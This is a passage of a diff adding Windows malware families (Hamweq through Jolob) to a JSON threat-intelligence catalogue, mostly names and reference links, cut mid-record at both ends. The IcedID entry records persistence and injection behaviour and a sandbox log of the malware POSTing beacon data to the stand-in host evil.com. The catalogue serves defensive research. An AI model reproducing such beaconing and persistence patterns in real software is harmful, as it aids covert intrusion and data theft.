"454fc9f7-b328-451f-806c-68ff5bcd491e", + "value": "Hamweq", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Chanitor" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", + "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", + "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", + "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", + "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak" + ] + }, + "uuid": "4166ab63-24b0-4448-92ea-21c8deef978d", + "value": "Hancitor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker" + ] + }, + "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", + "value": "HappyLocker (HiddenTear?)", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Piptea" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig", + "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html", + "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html" + ] + }, + "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", + "value": "Harnig", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", + "https://www.f-secure.com/weblog/archives/00002718.html" + ] + }, + "uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a", + "value": "Havex RAT", + "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries." + }, + { + "meta": { + "synonyms": [ + "Predator Pain" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", + "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", + "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", + "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/", + "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/" + ] + }, + "uuid": "31615066-dbff-4134-b467-d97a337b408b", + "value": "HawkEye Keylogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", + "value": "Helauto", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html" + ] + }, + "uuid": "19d89300-ff97-4281-ac42-76542e744092", + "value": "Helminth", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag", + "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/", + "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/" + ] + }, + "uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625", + "value": "Heloag", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst", + "https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware" + ] + }, + "uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a", + "value": "Herbst", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b", + "value": "Heriplor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", + "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ] + }, + "uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8", + "value": "Hermes", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ] + }, + "uuid": "4d8da0af-cfd7-4990-b211-af0e9906eca0", + "value": "Hermes Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes" + ] + }, + "uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21", + "value": "HerpesBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot" + ] + }, + "uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3", + "value": "HesperBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", + "https://github.com/goliate/hidden-tear", + "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", + "https://twitter.com/struppigel/status/950787783353884672" + ] + }, + "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", + "value": "HiddenTear", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" + ] + }, + "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", + "value": "HideDRV", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", + "https://www.recordedfuture.com/hidden-lynx-analysis/", + "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" + ] + }, + "uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1", + "value": "HiKit", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan", + "https://www.checkpoint.com/threatcloud-central/downloads/check-point-himan-malware-analysis.pdf" + ] + }, + "uuid": "ecad37b9-555a-4029-b181-6f272eed7154", + "value": "himan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat", + "https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat" + ] + }, + "uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab", + "value": "Hi-Zor RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux" + ] + }, + "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", + "value": "HLUX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", + "value": "homefry", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot" + ] + }, + "uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f", + "value": "HtBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat", + "https://www.riskiq.com/blog/labs/htprat/" + ] + }, + "uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0", + "value": "htpRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "HUC Packet Transmit Tool" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", + "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", + "https://www.secureworks.com/research/htran" + ] + }, + "uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8", + "value": "HTran", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser", + "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/" + ] + }, + "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", + "value": "HttpBrowser", + "description": "" + }, + { + "meta": { + "synonyms": [ + "httpdr0pper" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper", + "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf", + "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787" + ] + }, + "uuid": "78336551-c18e-47ac-8bef-1c0c61c0e0a9", + "value": "httpdropper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy", + "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", + "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" + ] + }, + "uuid": "339b3e7c-7a4a-4a1a-94b6-555f15a0b265", + "value": "http_troy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "houdini" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" + ] + }, + "uuid": "94466a80-964f-467e-b4b3-0e1375174464", + "value": "Hworm", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", + "https://securelist.com/luckymouse-hits-national-data-center/86083/" + ] + }, + "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", + "value": "HyperBro", + "description": "" + }, + { + "meta": { + "synonyms": [ + "BokBot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", + "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", + "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid", + "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", + "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" + ] + }, + "uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330", + "value": "IcedID", + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader", + "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/" + ] + }, + "uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16", + "value": "IcedID Downloader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog", + "http://www.kz-cert.kz/page/502" + ] + }, + "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861", + "value": "Icefog", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix", + "https://securelist.com/ice-ix-not-cool-at-all/29111/", + "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus", + "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/" + ] + }, + "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3", + "value": "Ice IX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey", + "https://isc.sans.edu/diary/22766" + ] + }, + "uuid": "3afecded-3461-45f9-8159-e8328e56a916", + "value": "IDKEY", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" + ] + }, + "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6", + "value": "IISniff", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + ] + }, + "uuid": "0ea585ef-bd32-4f5b-a3fe-bb48dc0956c7", + "value": "Imecab", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", + "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" + ] + }, + "uuid": "53021414-97ad-4102-9cff-7a0e1997f867", + "value": "Imminent Monitor RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Foudre" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy", + "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", + "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", + "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", + "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/" + ] + }, + "uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2", + "value": "Infy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat", + "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" + ] + }, + "uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1", + "value": "InnaputRAT", + "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole", + "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + ] + }, + "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", + "value": "InvisiMole", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Gozi ISFB", + "IAP", + "Pandemyia" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", + "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", + "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", + "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", + "https://lokalhost.pl/gozi_tree.txt", + "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", + "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", + "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", + "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", + "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", + "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", + "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based", + "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", + "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/" + ] + }, + "uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d", + "value": "ISFB", + "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", + "http://www.clearskysec.com/ismagent/" + ] + }, + "uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2", + "value": "ISMAgent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor", + "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "http://www.clearskysec.com/greenbug/" + ] + }, + "uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b", + "value": "ISMDoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger", + "https://www.zscaler.com/blogs/research/ispy-keylogger" + ] + }, + "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", + "value": "iSpy Keylogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer", + "https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/" + ] + }, + "uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989", + "value": "ISR Stealer", + "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" + ] + }, + "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a", + "value": "IsSpace", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/" + ] + }, + "uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2", + "value": "JackPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff", + "http://malware-traffic-analysis.net/2017/05/16/index.html", + "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart", + "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html" + ] + }, + "uuid": "2c51a717-726b-4813-9fcc-1265694b128e", + "value": "Jaff", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor" + ] + }, + "uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9", + "value": "Jager Decryptor", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Reconcyc" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku", + "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146", + "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf" + ] + }, + "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112", + "value": "Jaku", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea", + "value": "Jasus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw" + ] + }, + "uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9", + "value": "Jigsaw", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy", + "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" + ] + }, + "uuid": "551b568f-68fa-4483-a10c-a6452ae6289e", + "value": "Jimmy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap", + "https://www.us-cert.gov/ncas/alerts/TA18-149A", + "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", + "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" + ] + }, + "uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b", + "value": "Joanap", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao", + "https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/" + ] + }, + "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6", + "value": "Joao", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob", + "http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html" + ] + }, + "uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631", + "value": "Jolob", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 